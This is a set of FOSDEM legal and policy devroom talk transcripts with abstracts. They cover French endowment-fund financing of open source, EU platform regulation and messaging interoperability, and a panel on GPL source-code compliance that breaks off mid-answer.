mentioned it during the European Commission's workshop on the future of open source software and hardware. And we were, we did a follow up pitch project for a bigger initiative on European level, but nothing came out of it to this point, unfortunately, but it was still interesting to discuss and work on it. Current status is that we have a backlog of about 150 publishers we would like to add. We also need to update also the financial indicators and also improve filtering and export of data. So it's easier to use and easier to integrate. So if this is a project you like to contribute to, we're very happy to accept donations or also contributions to add more software companies to the directory. The last example I will talk about is from the open policy area. It's about the health data hub. If you're not from France, you probably don't know it. It's a French platform created by the government to collect hospital patient data. The contract was awarded to Microsoft in what later turned out to be a very questionable process and FDL was involved in financing two lawsuits based, one based on the tender process or the lack of the tender process and the second one regarding Shams 2. The two lawsuits were filed by an association called Santé Naton. It's a group of IT companies and non-profit organizations who work in oil fields relating data protection in the health sector. And the Sénil route at the end of the year, the Sénil is the Commission Nationale d'informatique Liberté, so I would say the National Commission for Data Privacy. It ruled that in fact the health data hub needed to provide short term guarantees to assure that the data stored on this platform with Microsoft was not accessible by foreign governments. If you probably are all familiar with the cloud act and similar legislation in which gives access to data stored on servers of American companies no matter where they are located, so it was said that this was not okay to use Microsoft for storing these type of sensitive data and the second request aside from providing guarantees was to also migrate the platform to a French or European provider. So I think this was November, December last year, so it's still a topic which is far from over in my opinion and also if you look at the last decree of the outgoing president, one was on requiring US cloud companies to verify the identity of foreign individuals using their services. So I think this would be an, until there's a real migration to a French or European provider. I remember there was also a Tribune last week which talked about this in France which said this should not take five years or three years, this should be done quicker. So it's a topic far from being over. But speaking of being over, that was almost my last slide. Coming to the takeaways, what you should take out of the last 15 to 20 minutes. There's points of was eating the world, but it's also is often found out in numerous studies, nobody is really paying for open source software. But provided the legal conditions, endowment funds can be a tool to facilitate or to incentivize investing in open source software development. Maybe this is one of the reasons why the French ecosystem of free software providers is so vibrant and active because it's easier to finance. In fact, the development of open source software here in France. And since it's a topic continuously being discussed on European level for, well, I guess for quite some time now. And for me, one of the advantages I see in Europe, I always talk about is that you have 27 different attempts to solve certain problem and just by looking abroad at how other countries are doing. And if you're able to pick things which work in countries that are successful in certain things, you have more, yes, there's more chances to find the best practice. And I don't want to say the French model is the best practice, but maybe it's something which warrants attention, which could be replicated elsewhere on national or maybe even on European level. It's also, I remember another tribune from Julia Reda a few months ago, which was asking for just that was the Europe's Open Technology Fund, where she was talking about similar things. And I don't know if it's a fund or if it's tax incentives, but if the topic is also like in another initiative, public money, public code, I think if you take the general interest and if you can argue that open source software is in the general interest and it could be financed as being a general interest item. I think it opens quite a few interesting doors on what you could do with open source software and how you could finance it. Voila, and this is the end of my presentation. I'll be available for questions. I think the next 10 minutes and afterwards as well. So let me know if any of the projects interested you, if you have any follow up questions and thank you for your attention. And I hope you can enjoy FOSTA in the online version that it is and I'm looking forward to hopefully next year having a real FOSTA in Brussels again. Thank you very much and bye-bye. So, we are live for the Q&A session. Thanks Frank for your talk. That was quite interesting and yeah, I think financing a free software project is always an issue. We now have seen how you do this in France, but do you think governments have to invest more money in free software projects? Do you think they should support it? You also mentioned the UTEC fund for example. So what are your ideas here and also maybe on the national but also on the European or even global level. Do you have any ideas here on that? So let's say, basically to answer yes, of course governments need to finance free software free and open source software. I think there's already quite a few things which exist from if I look on European and French level, the projects, the funds like Horizon, I think it's 2027 now. Projects we are also participating in and usually they all require the software to be developed to be open source. So I think on this on the one hand is a nice direct way to finance free and open source software. The vehicle I described in my talk is an indirect way, which I think also helps because you can for example now see it with the plan de relance or the recovery plan from COVID where at least here in France has not the administrative infrastructure to handle a lot of small projects. So the recovery funds usually I think they start at 50 million or higher. So all the small and medium enterprises are more or less not able to participate in project calls like this because the budgets are much too large. So I think you really have to look at it from two ways on the one hand, what direct forms of financing can you provide for free and open source software and what indirect tools or vehicles can you set up or support that also allow to finance free and open source software in a much more broader scope. I see. And what are your experience with the administration part of it? Normally if you work together with governments or administrations, you are confronted with a lot of paperwork for example. So what is your experience here, is there anything which should be or could be improved or is this working quite smoothly for you? So it's a lot. I think it's also important to have it because I mean there's also a due diligence on the side of whoever provides the funding who decides to give public money to finance a certain project. So it's necessary to have the legal security also on behalf of who is financing to make sure that the money goes into projects which really have the potential to turn out something and it's not wasted. So I don't know how to simplify it. It's a lot. I'm handling currently four projects and it takes time, let's say it like this, but it's also okay. And I mean let's say you have economies of scale if you handle more than one project because you can like from the administrative side, at least from a participant, you can reuse templates for reports. So let's say you try to cut corners on the administrative side when you have more than one project. So that helps. Yeah. So once you figured out how it works, then it's getting easier by every project you are running right? Yes, let's say that it helps, let's say like this. Of course there's differences on national and European projects, but still you can like the even for the project applications, we always use the same template and you can more or less streamline a lot of things. Let's say like this. So yeah, but it's important. So I like that these possibilities exist. I wish there would be more. We also coming back to your earlier question because I think how to say open source has or free software has a, is a general interest topic. Looking for good example. I think what we've seen just currently is the Corona tracing app. So this is something everybody or every country needs and especially in Europe we speak so many different languages and but also we are traveling a lot across borders and therefore it's a good idea to have interoperable solutions in place and yeah, and I also think national and European funds would be very helpful to support these kind of projects and this is for me at least to take away from this crisis. So yes, I was happy to see so many initiatives trying to work on open source software solutions to respond to COVID what was talked about in the earlier panel and I think there's how to say a society is the sum of contributing. I always say open source is like, they're like as a everybody can make a contribution and it's a bit similar to society where everyone can make a contribution. So I like the idea of having an open system where we can contribute to and you will have the potentially the ideas of everyone and the knowledge of everyone rather than something cooked up by a few people. So I'm a defendant of the idea that the more people contribute their ideas and capacities to something the better the solution will be in the end. So yes, I think it's very worth supporting. It's definitely true and I think these are also good final words for this talk. Now we're handing over to the compilance panel which will happen directly after this talk. Thanks a lot Sven for this talk and for being here for the Q&A session. Enjoy the FOSSTEM also the deaf room here on legal and policy staff and yeah, thanks a lot for being here and see you later and yeah, thanks for joining. No problem, thank you very much for having me. Bye bye.
|
Financing open source using tax breaks on donations made to endowment funds or general interest associations is a construct available in France and a viable alternative to R&D expenditures for sponsoring open source projects. We will present several initiatives from the Libre Endowment Fund ("Fonds de Dotation du Libre" in French) - from financing feature development of open source software to releasing a 4G/5G base station as open source hardware or supporting litigation against the French government's decision to host Health Data on Microsoft servers. The recently published FOSS contributor report showed that 48.7% of contributors were paid for their contributions by their employer with only 2.95% being paid by a third party. So even today as (open source) software continues to eat the world, almost half of all projects lack the financial base for ensuring their respective software's long-term existence. To finance the long term maintenance of its open source software stack, Nexedi has created the Libre Endowment Fund ("Fonds de Dotation du Libre" or FDL in French). It is a French endowment fund which complies with strict auditing procedures. With this status, French Law permits corporations and individuals to donate to the FDL and claim back up to 60% from future income taxes (65% for individuals). Rather than investing directly in the maintenance or continuous development of own or third party solutions, Nexedi and other companies (ex. Amarisoft) can pool donations which then support the maintenance or development of open source software, open source hardware or open services. FDL also benefits from a scientific board of advisors which include three developers of open source software (Jean-Paul Smets, Stéfane Fermigier, Gaël Varoquaux) who also hold a PhD in computer science or mathematics. This scientific board follows the same procedures as governement sponsored RTD projects and thus also contributes to the juridical safety of FDL.
|
10.5446/47989 (DOI)
|
Hello, and welcome to my talk on the regulation of the Internet platforms in Europe. So first of all, a couple of words about me. My name is Vittorio Bartola. I am the head of policy for Open Exchange, which is a German open source software company with MacDavgoth and PowerDNS. And today I would like to introduce you to the new proposals for regulating the Internet platforms that have just been presented by the European Commission. But first of all, I'd like to explain why they have been presented. And so what's the analysis of the scenario, which is pretty common in Brussels and among European politicians. And it's what I call the Hotel California. So when the Internet was started in its first early decades, it had success, exactly because of this model of interoperation and interconnection between networks and between services. And the example of how the services were initially made over the Internet is email. Email is an interoperable service. You can get an email address from any provider you like, and that is enough for you to communicate with any other email user all over the world, independently from which applications they use, which provider they use, which services. And anyone can offer email services, all the standards are open, are public, there are many free software implementations. It's actually very easy for anyone to start email services. And this is what happened and what allowed the Internet to grow so quickly. And it's not just about email, the web initially was made in the same way. And this is what unleashed the power of growth of the Internet. But then something happened. The Internet became a mass media, became the object of consumer services, and a lot of money started to revolve around it. And so consolidation started to happen. And a few companies started to become bigger and bigger. And we ended up in very concentrated situations. So for example, after the smartphones came, I mean, the smartphones market is now very concentrated. You only have a choice between two operating systems, either it's Google Android or it's Apple's iOS. And even in terms of the apps, there are millions of apps, but in the end, the ones that use more frequently are often owned by the same company like Facebook for social media and messaging apps. And the move to the cloud also has the same issue. The cloud market is quite concentrated. Actually, the biggest players have well over half of the market. And you see, they are always the same companies and also some of the Chinese companies are now coming. So these are just a few examples. But in the end, now we are in a situation in which the tech companies became so big that they reached a size that was never seen in the history of mankind before. So there have been tech companies, I mean, very big tech companies in the past, but it never happened that the five most valuable listed companies in the world were five tech companies. And in 2019, they went over the $1 trillion market capitalization, which is amazing. But it's continuing to grow. So this was about two weeks ago, and Apple was already well over the $2 trillion mark. And $2 trillion is more than any EU countries GDP, except for France and Germany. So these companies are now bigger than most European countries. And this is scaring European politicians. So this is seen as a problem. For example, I mean, to show how this actually affects European budgets, this is a chart showing the advertising revenues of Google from Italy in 2018. It's estimated that over 700 million euros were the revenues of Google from advertising in Italy, but then less than five million euros went back to Italy under the form of taxes. And all this money is being brought to Ireland. And then from Ireland, it's being brought to the global headquarters, and it goes there. And so there's very little return for Europe on this. And on the other hand, what you see is that the median house price for a house in San Francisco has grown by 2.5 times in seven years. So you really see all these wealths being taken away from Europe and from other parts of the world and moving into this very small part of the US being concentrated there. And this is not something that Europe can accept. It's becoming a threat to the economic stability of Europe itself. So this is what we call Hotel California, because you can check out any time you like, but you can never leave, because all the services are owned by these companies, and they adopt the business practices that make it very hard for you to move to something different and make it very hard for any new possible competitor to grow and actually succeed in competing with them. They adopt business practices that make this very hard, and they build world gardens that keep you locked in. And as an example of this, I mean, the good example is instant messaging, especially if you compare it with email. Instant messaging is built around world gardens. So you actually need to have several apps, because if you want to speak to exchange messages with WhatsApp users, then you need to use WhatsApp, but then you also need to have Messenger to communicate with Messenger users, and then Skype for Skype users and Telegram and so on. And so you have to handle a plethora of applications and accounts, and this is inconvenient. And more importantly, you cannot move. So you don't really have a choice. If you want to move to a different app, you lose your contacts and use your history. And this makes it harder for new competition to emerge, because even if you can start a new instant messaging, even a best possible instant messaging app, much better than the existing ones, then people won't bother trying it. And even if you convince one to try it, then there would be no other users. So they would not be able to exchange messages with anyone else, because all the users are still on the other surface. And so this is built in a way that forces users to stay there and basically stifles competition and innovation as well. And so once these control positions are built, we've seen from Europe more and more examples of how this is leading to things that we don't like. So we've seen the Huawei case, for example, which Huawei was suddenly shut out of, I mean, basically using Google Android, and that's actually an example of something that happened not just because of the company, but because of the fact that the company was located in a specific other country outside of Europe. There was a president at the time who decided to force them to do this. And this is a risk which is unacceptable for Europe and for its companies. On the other hand, I mean, sometimes it's the company that forces you. I mean, Apple is known so that if you have an app and want it to do on the app store, then if the app sells something, you must use Apple's payment system and give them 30%. And you don't have a choice about this. And then there's an issue with startups with the big platforms buying out European startups before they can actually become big and continue to stay here and compete and create wealth and jobs here. There is a big concern in Europe around surveillance capitalism, Europe with GDPR has been trying to stop this. But I mean, these big platforms, many of them make most of their revenues from target advertising like Google, like Facebook, even Microsoft makes money out of being advertising like billions of dollars. And even for the non-personal data, I mean, these companies are amassing amounts of data that put them at an advantage in competing with everyone else. I mean, the fact that they can aggregate the information that they acquire by tracking people. And so they make it hard for other people to offer the same services successfully. And then there were situations that have again concerned the European politicians, the NSA scandal was a big scandal in Europe as well, because it affected also Angela Merkel and other politicians. And so that's when they realized that relying on technology and services that are provided by companies, foreign companies outside of Europe, I mean, is a strategic list to national security. And there's a concern about the encryption now because when the encryption is a good thing, it lacks your privacy, but then it makes it also very hard even for users themselves to control what's happening. And so, I mean, if you couple this with the internal things, we're building the internal people's things, we are filling our homes with objects and home assets and smart TVs. These devices send back encrypted data all the time, you have no idea what they are sending back or where they are sending it. And I mean, it's very hard to enforce the laws because I mean, the services are being provided from outside of Europe. And so we are creating a situation in which the user and even the local authorities have really no control over what's happening about the data. And the most recent cases that created concerns again, were high profile situations like last years, coronavirus apps, when Google and Apple basically decided for everyone, for all European countries how this should be made, technically, but also in terms of policy. And there were some countries, especially France, that were really not happy about this. They wanted to do things in a different way. And then they were faced with the choice of either doing like Google wanted and Apple, or I mean, having a hard time in making things actually work. And so this was deemed unacceptable by several of these countries, even if they had to put up with it. And finally, very recently, there's been the Trump ban case and Angela Merkel, through her spokesperson, has actually spoken about that and expressed concern because, I mean, no matter what you think, actually what happened, the idea that a private American company can silence a ruling politician, elected politician of a Western country is considered really unacceptable and scary in Europe. So what's happening about this, this is how Europe is trying to run for the door and change this situation. So there's been a lot of talk in the last couple of years in Brussels, mostly other capitals like Berlin and Paris, about digital sovereignty. So that's the term of art now. This term means different things to different people in different countries. So in Germany, it's more about the digital autonomy. It's more about having local European services so that the data stay in Europe are managed by European companies under European law. And that there's the capacity to survive any kind of embargo or commercial problem with the US and with China, so that actually the national economy and the national technological platform can survive even international problems. For the French, it's really more about sovereignty. It's about controlling the internet, being able to make rules and enforce them and deciding, for example, issues around content and checking what's going on over the internet. So all these different things go under this term of digital sovereignty. And there's a number of requests that are being made in different terms, but this is a lot of course different people in countries have slightly different views, but more or less summarizing this is a longer list of what Europe expects from the big tech. The first of all, pay taxes here and don't bring all the wealth somewhere else. And stop tracking the citizens, share the data, don't steal startups, don't kill competitions, or don't adopt these locking practices and exploit the dominant positions. And stop spreading the fake news and especially making money out of fake news and harmful content and bad stuff that's all over the place. Don't silence people so that we want guarantees about free speech in real terms. And also there's the discussion around encryption and about lawful interception of encrypted communications, which is also a very delicate discussion that's going on. So some of these requests will be addressed by the regulations we are going to talk about. But first of all, since we are at first, then I'd like to point out that open source is also part of this picture. And open source actually fits the European policy because often Europeans are told, I mean, you should just develop your own Google. If you don't develop a Google, that's because you're bad, you're not good at creating companies so it's too bad for you. But it's really different because Europe is not a monolith. It's an archipelago of countries, of markets. It works really by horizontal cooperation at any level. And so this is why naturally it doesn't produce Gaffens. It produces alliances of smaller companies. And this is really the model of open source. I mean, interconnection and peer-to-peer cooperation around the common open standards. And this is why the European policies are more and more promoting and defending open source and choosing open source as the model. And so while open source, the open source movement is putting the technology and the standards and the experience in cooperation, Europe is putting the rules, the funding and trying to defend the rights and the opportunities for the open source movement as well. And so this is why you will see open source quoted a lot in European press releases. So now finally we can get to the three proposals that I wanted to talk about very quickly. I mean, the first one is the so-called digital sources sector. And it's the one focusing on content, accountability, advertising, and moderation, and so on. The digital market sector is more about competition. It was originally called the new competition tool to address situations of, I mean, market failures that are not really falling into traditional competition law. It's about business practices and it's about interoperability as we will see. And finally there's the data governance act, which is really about access to public data. So now these are just proposals. The first drafts have been released by the European Commission and they are up for discussion. They will still have to go through the European Parliament. It will still take at least a couple of years for them to be approved if they ever get approved. So it's really the time to discuss them. So the digital services act is basically the old commerce directive. So it's restating and holding the original merc conduit principle that says that intermediaries are not responsible for the content they transmit on behalf of the users. But it's putting conditions on that now. So first of all, there's a GDPR style global rich clothes so that even non-European companies, if they do business in Europe are affected by these rules. And there are additional requirements for the online platforms, which are platforms that disseminate user provided content or sell user provided goods. And these platforms are required to provide the course mechanisms against their decisions to identify their business customers, to rely upon trusted flaggers to take them content promptly when necessary. And there are additional clauses for very large online platforms, which are the ones that have over 45 million users. They are about transparency and accountability of algorithms, of moderation procedures. They are about risk management for manipulation, also foreign manipulation. They are about giving choice about content recommendation and curation algorithms and so on. The digital market sector, as I said, is more about business users for two-sided market platforms like Amazon. And it affects the gatekeeping online platforms, so 45 million consumers, but also 6.5 billion euros of annual turnover in the union and at least three European countries. It's basically a new instrument for the digital age, for situations that don't fall under traditional, I mean, dominant position definitions, but still are deemed to affect competition. So this is where I wanted to focus more precisely on interoperability, because, I mean, part of the digital market sector is just about forbidding very basic practices that are deemed to be negative for everyone except for the platform. So, for example, mandatory banning of services is forcing you to use more than one service and integrate the data across the services, or best price clauses that force you to offer the best possible price through the platform, clauses that prevent you from going to court with the platform, and other things like that. So there's a sort of list of prohibited practices. But then there's another article which is about things that are to be better specified. And interoperability is one of them. So why is interoperability important? Because I mean, to get back to where we started, it's the original principle of services, and we think that services like email that were built around interoperability mean offer much more choice and competition and opportunities for privacy than the most recent instant messaging services. So we think that even for these newer services, the dominant platform, the dominant players, should be required to interoperate with competitors and allow third-party applications to exchange messages with their users through common interfaces. And this would allow users to choose any app and service provider they like, and also it would allow new entrants to propose new applications and actually have a chance of succeeding in competition, because then users could actually try these new apps and still continue discussing with their existing contacts on the old applications. And so this would enable European competition, European companies to grow and keep wealth and jobs here, and promote private services, because if users could choose, they would not be forced to accept unilateral terms and conditions by these platforms, which are often pretty negative for the users. They would be able to pick the most privacy-friendly services. So there are some interoperability clauses in the draft of the DMA. There is basically one that says that business users have a right to interoperate, but only for auxiliary services. Ancillary services are, for example, payments or logins and identification services or advertising services, but not for the core services. So this is just about this separate auxiliary services. And there is a clause also on portability, which was possibly introduced with the hope that by giving you real-time portability, you could build a third-party app that in real time gets your new messages from the existing app. This is not a solution for the problem, because this model of interoperability would require you to still maintain an account on the existing dominant service. And so it would require you to accept their terms and conditions and give up your privacy and your data. So we think that this is not really a solution. So this is why as part of a coalition of NGOs and European companies of the messaging space, we are really trying to ask for true interoperability to be added into the DMA and to be required to dominant platforms, not just for business users, but interoperability and fair competition and choice should be available to all European citizens. And interoperability should be mandated for all core consumer services starting from messaging and social media, not just for the uncillary ones. So these are the requests that we have been doing, and I'm glad I could share them here. And of course, we are happy to – we hope to create some discussion around this in the community, and I'm happy to take questions. So thank you for your attention.
|
The Internet originally thrived on interoperable services - until the "walled gardens" came. The European Commission recently proposed new regulations (DSA/DMA/DGA) to protect democracy and restore openness and competition. The talk will introduce them and their economic and political background; it will then focus on a specific point, the requirement for dominant platforms to interoperate with third parties, though only in limited cases, using messaging and social media as example. A few decades ago, the Internet was open, interoperable and based on federated services that allowed everyone to cooperate and deploy new content and services: email is the classic example. Then, consolidation happened: the talk will show a common European perspective of how we ended up with a concentration of money and power of unseen scale in the history of mankind, which perpetuates itself by adopting the "walled garden" service model. The best example of this model is instant messaging, where people have a hard time switching to different service providers as they need to be on a specific app to communicate with all the other users of the same app. This creates dominant positions that are often used to impose unfavourable terms and conditions onto users. In the European political and regulatory scene, this has been increasingly perceived as a problem under many dimensions: tax revenue, privacy, national security, law enforcement, free speech, and even democracy. All these dimensions boiled down into a call for "digital sovereignty", meaning more autonomy and stronger reliance on EU-provided services that keep the wealth they produce local, but also more control and stronger capabilities to set and enforce European rules for the Internet in Europe, without having to negotiate them with the big American platforms. Open source has been identified as a fitting software development model for Europe and increasingly supported. Open source development matches the "cooperation in diversity" that is required by the multinational, multicultural nature of the European Union, and naturally offers remedies to consolidation. After quickly introducing the three regulatory proposals - the Digital Services Act, the Digital Markets Act and the Data Governance Act - the final part of the talk will focus on the DMA and on a specific topic: interoperability provisions. "Walled garden" instant messaging apps could be turned into open, federated email-style services by forcing dominant providers to open up and interoperate with potential competitors, so that users of one app could exchange messages with the users of all the other apps. The current DMA proposal by the European Commission, however, only does this in part. The interoperability clause in Article 6.1(f) only covers ancillary services such as payments, advertising or identification, but not core services like messaging and social media; and only for business users. The "real time" data portability clause in Article 6.1(h) would not allow true interoperability and would still require users to hold an account on each service and accept its unilateral contractual terms. The talk builds on the efforts of a coalition of open source software companies and digital rights NGOs that have been campaigning for full interoperability clauses in the DMA. It also builds on a technical policy paper that discusses the topic and that was submitted to the Commission during last summer's consultation. We hope to open up the debate, validate our ideas and build community discussion around this issue.
|
10.5446/51978 (DOI)
|
Hello, everyone, and welcome to our panel for our FOSDEM legal and policy dev room on compliance. This has become somewhat of a staple for our dev room. We're doing it, of course, remote this year because of the pandemic, but we have a couple of great panelists that are going to dig in today to discuss the issues of doing GPL compliance with a focus on what happens for the customers, the users, the individuals who get devices, how do we assure that they have the source code they're supposed to get under copy left licenses that works, and we're going to talk about it from a number of different perspectives from folks all over the industry. I have joining us today, first of all, John Sullivan, the executive director of the Free Software Foundation. We have Davide Ricci, the director of open source technology center at Huawei. We have Eilish Nilonigan, also known as Pidge, who is the CEO and CTO of Togan Labs and the chief architect of Network Grade Linux. And coming to us from the legal side, we have Miriam Belhausen, who's a lawyer at Bird and Bird and focuses on copyright law. So to get started, I would like to start with asking John a question because, John, you worked for the principal person at the organization that started the whole idea that software freedom was an important issue way back in 1985, and we're really the first to talk about why it's important. Can you tell us a little bit about why the issues of compliance with copyright, the copy left licenses fit so directly and importantly with the issues of the compliance requirements, the details in those licenses that companies and redistributors have to follow? Sure. And thanks for having me on the panel. I'm looking forward to the rest of this discussion. I think it's a very special thing about free software that it is designed to have both fully commercial and non-commercial purposes. And so we, at the FSF, use this as a social movement for sure with an ethical foundation and an ethical mission, but these chances to talk together with the people that are using the software commercially and have experience doing that and hearing their experiences is really an important part of that. So the primary copy left license, I think that we have in mind is the Gidu general public license and that has a very simple requirement and it's a phase that you have to share when you distribute a program to another person. You have to share the source code, which is what you as a programmer or what the programmer is that you hire actually use to modify the program and create the program, the human readable code. And the reason that that's requiring it is because of binary program that's not particularly useful other than for purposes of being able to run it or hand it off to somebody else so they can run it too. If you wanted to understand anything much about how the program works or you want to be able to make changes to it, you have to have the source code for that. And that's the whole reason for free software where it's existence is so that users are in control of the devices that they have, the software powered devices that they have rather than those devices being in control of them. And if you can't inspect the program that's running on your laptop or your phone or in your car, then you can't actually know what it's doing other than trusting the company that gave you that software, you know, trusting that they're telling the truth. The same point of example is unfortunately where that doesn't pan out. And then second of all, even once you understand it, if you want to be able to make a change to it, you also need the source code for that. And I think the closing key thing here is just that these rights aren't just for programmers. Anybody, if they have the source code, can go to a programmer and ask them to make a change for them, just like you can get your car repaired at a mechanic or have someone else fix the HVAC system in your house. But you can't do that unless you have the rights to the source code and the freedom to take it to other people and ask them to do things. And Pidge, that's why I want to come to you here, because one of the focuses of your work is, as I understand it, is to help people and help those who build these devices, which are these days a lot more complicated than they were when these licenses first came out, to actually make that software build and work correctly and create these compliant source releases that are required under these licenses. Can you talk a little bit about what you're seeing in your work and trying to help your clients get that source code right? And what the challenges are that they face with regard to the interaction between the details of that software and its source code and their compliance requirements. Right. So a little background here. When people do a lot of software compliance work, they're doing it around one chunk of the software, undoing an entire firmware blobs, so entire Linux stacks. And it's complicated because you just, it's not, I need to know what software is on it and what the licenses are. You also end up needing to know how it's built and how it's all tied together. So with a lot of my clients, it's initially, why do we need this? Can't we just throw out the metadata and just have it that way and not actually provide the source code? They can get the source code from upstreams, that conversation. So there's a period of buy-in initially, and then the complicated work happens, which is going through each and every bit, figuring out which source package is using, because one bit of source code or one package may have multiple things that come out of it with various different licenses. So for example, I don't know, I use this all the time, puzzle. Puzzle may have puzzle, puzzle dev, puzzle docs, and they're all going to have very different licenses. So it's understanding everything from nuts and bolts all the way from initial build system all the way to how everything's built to how everything's deployed. So there's a lot of teaching developers, things that they shall not do, like static compilations of close-arge software against GPL code, which we have to have that conversation. And software developers are clever and they go, what if we do a shim layer and, and, and you know, just stop trying to get around that. So there's a lot of education on the corporate side that I end up having to do to teach developers how to do this, how to do this correctly, and how to do compliance activities afterwards. Does that answer your question? Yeah, it does. And I want to go to Davide now, because what you're, what you're doing is you're looking from inside your company and trying to build up and answer these questions so that your employees know how to do this correctly, how to incorporate free and open source software into your products. Why don't you tell us a little bit about how you design that strategy from inside a company to make sure that you're getting that final source release at the end, as, as Pitch says, is looking at the entire firmware blob and making sure you have what's required for the entire firmware, not just one part. So first of all, the, you know, I've done this couple of times, I've done it at Windriver and I've learned at the Intel OTC school up in Portland, and then I'm not doing this a while way. So first thing that you had to do is just do it first. Even before you start building codes, you know that you're going to be using open source software when you build an operating system. So first thing that you had to think is, how do I ensure the compliance, right? And how do I do it incrementally? So over time, I mean, initially it was a lot of, you know, guests and let's figure it out, you know, work. Right now we have good standards that are coming up, for instance, Linux Foundation with the open chain standard, which is really industry-oriented. Free Software Foundation is helping us a lot, especially in Europe, helping Huawei to actually do it, right? But you know, it's about, as I said, if you want to go with open chain, it's about creating a policy, funding the policy. So essentially you got to make sure that it's funded. There's people to actually follow the policy. Training individuals so that developers, managers, they know what the process is, what their roles is. So then at the end of the day, everybody knows the dues and the don'ts. And then when you start building that build of material that tells you, hey, in this device, there's this software, these are the licenses, this is the manifest, these are the author, this is the license that we think the software has. Oh, and by the way, hey, IP analysts, can you go look because some licenses are not clear. At the end of the chain, you have the best possible accuracy when it comes to the build of material. There's no 100% accuracy in businesses about risk and gain. But as a general manager, I don't want to go to market with a big unknown. So at the end of the day is the most accurate build of material that gets me through. And if there's a red flag that is flagged by, you know, from you by the team, then, you know, you take a risk-based decision. But that's pretty much the process you follow. Yeah. And so you identified risk and that brings me to want to ask Miriam about that question of risk because ultimately the reason, if there were no requirements in any of the open source and free software licenses that we have, particularly the copy left ones, no one would worry about any of these questions that Davide is talking about. So Miriam, what do you see? We're so many years now into adoption of open source and free software in companies. When you talk to your clients, what is their legal concern? What is their fear? And on the other side of it, are they able to see it, convert that legal risk into let's make things better for our customers? Like where do you see that divide happening in the clients that you're talking to? Yeah. Happy to answer that. And also, thank you for having me on this. So to be honest, I think there's a big difference between different types of companies and the risks or the issues that they see. So there are, let's say, companies that have been in the software business for a very long time and they've been working, developing with software. They are really knowledgeable already. They know what they're doing, maybe kind of like Huawei. And as David just said, they are looking into this. They are working on strategies. They are looking at the software that they're using. They are looking at it from the beginning. And they have very specific questions. And they generally also already know how they would handle certain risks. And then on the other end of the spectrum, you have more, let's call them traditional companies coming into the software space that have maybe just built whatever device, let's say a fridge for years. And now all of a sudden, the fridge is smart and uses a lot more software and they are working with a lot more software. And that's really not their core business so far. And they tend to be looking at the software development and the risks they assume open source software has from a totally different perspective. So with these types of companies, you would still hear questions like, well, how can we even use open source software? There's a copy left in there and all of that is a really big risk. So you kind of have to find out where do they stand, how far along in this development are they? How much have they looked into this? What type of developers are they working with? How knowledgeable are they? And how much are they pushing? Are there maybe differences in the different areas they are working in? So yeah, that's a big spectrum, I would say. And so I want to connect that up to ask John because when you talk about the risk reward and analyzing that, I think from the activist side, you probably look at this a little bit differently. So the reward, I would guess, to the activist, admittedly I'm an activist too, so I know this is true, that the reward is that with copy lefted software being in these devices, it means software freedom for people who get the devices with the source code correctly. But of course, the risk is the risk of non-compliance. And in your world, that means software users don't get freedom. So when you look at this, how do you reconcile all that question of risk and help to educate and explain to people that the risk is really a reward because your customers get software freedom? Yeah, and I think that it's important for anybody distributing particularly copy left software to understand that this dynamic is what gave them that software to begin with. And so the risk of non-compliance, on one hand, an important part of it is that you're not respecting your users, your customers, anybody that's receiving the software from you, but you're also sort of in a long-term way undermining your own business model. Because this collaboration model is what created the software that you're using that you're able to ship with your products. And if you're not doing that properly, then you're not enabling possible participation by other people. You're not enabling bug reports. You're not enabling the entire culture that created this thing that you're able to use. But yeah, it is for us, it's more than just the risk from a very short focus. The company perspective is possibly being sued or having to go through a complicated legal conversation with somebody. And that is certainly a risk that people should worry about. And one of the things that we do is enforcement at the FSF on the new software that we hope copyright over. But really, we want everybody to participate in this process and treat this process as something that benefits them and creates a level playing field where no competitor of yours is getting an advantage either by skipping out on some of the requirements here. So I want to go back to Pidge because that interesting thing about the competitor issues, one of the important things about free software and copy left in particular is it assures that everybody's on equal footing. So Pidge, when you're looking at this from an embedded side of building these firmwares and checking the compliance of the firmwares and checking they build, what concerns do you have as you're doing the analysis to sort of get to the conclusion of, well, does the source code really work? And are we putting something out there that can actually be collaborated over as far as the technological solution versus just kind of meets the bare minimum of the requirements, which might not necessarily inspire that kind of collaboration. Can you talk a little bit about how that divide gets handled when you're doing this kind of work both as an upstream and for a client who's asking those questions? So I'm going to plug the project that I work on, the doctor project in that. I have to because when I wrote the initial pass through the license compliance stuff and when I was told to write that, I was told to go talk to the lawyers about this and I'm like, screw that, I'm going to go talk to Bradley because he's one doing license compliance. You remember the conversation, I'm sure. And I went and talked to the lawyers and then I talked to Bradley and then I was like, okay, this is what he's looking at. So from my perspective, the outputs that the doctor project gives should also be able to be inputs as well so that people can do this. And it makes sense from an embedded perspective because if you look at where embedded is going, if your refrigerator is embedded, refrigerators last what, 10 years? I don't want to be maintaining firmware for 10 years. I want the community to go out and do it. So from my perspective, it goes, there's compliance at the top of the stack, but it goes all the way down to the bottom of the build system and ensuring that the things that come out of the top of the stack are able for the community to go take those and regenerate them all from scratch. Now, there are folks that do not like doing that and I tell them to suck it up because it makes no sense not to do that. So that brings me back to a couple of things that Davide was saying. So there is this and I always promise I'll ask a few hard questions. So this may be a hard one. But you mentioned a lot of these initiatives in your initial comments there that are out there related to bill of materials and trying to get just a list of licenses, which I think everybody would agree is the first step you have to do. One of the concerns and I'll show a little bit of my bias here I've had is that it's kind of what Pidge is saying is that that's a necessary but not sufficient thing to really get a compliance source code software build. So can you talk a little bit Davide how you're treating this inside of a company when you're looking out there to say, well, okay, we do need to get that bill of materials together, but then we have to get a source release that actually works and that our customers can rebuild and reinstall the software onto our devices in the field, which I think we all agree is a technologically challenging thing to do. How are you looking at that and addressing that when so much of the compliance focus is just on that initial step and sometimes misses that later step. So I think those are complementary matters. And you know, it's hard to just draw a line, right? And I think it kind of goes back to a couple of things. Number one, why a company is in open source, right? So I think unless you're really 1970s software company that still believes that, you know, the value is in the software itself, I think most of the software companies today has moved past the idea that you monetize the software itself, and it's about monetizing what's on top through value at services, etc, etc. So in that perspective, software becomes the vehicle to, you know, value at services and monetization. So I mean, you don't want to take any risks. I mean, you want to be complying until the very end of it, because you actually won't meet people to use more and more and more of the software that you contribute, because by using that, that becomes the vehicle for you for an upsell, right? So when the business comes into the picture, now you understand that that's not a cost, like screw it, you got to suck it up. No, it's not a cost, it's actually a value, you want to do that, right? And then as you start doing that, it's kind of natural that you're going to try to drive efficiency into the process of this, it's called compliance envelope, so that from the very beginning to the very end, things are, you know, that are added onto that have a piece of information, right, so that this compliance envelope can traverse, right? So I think, you know, in general, you know, it's seen as an obstacle or a cost. And I'll tell you something different, right? Or something more, 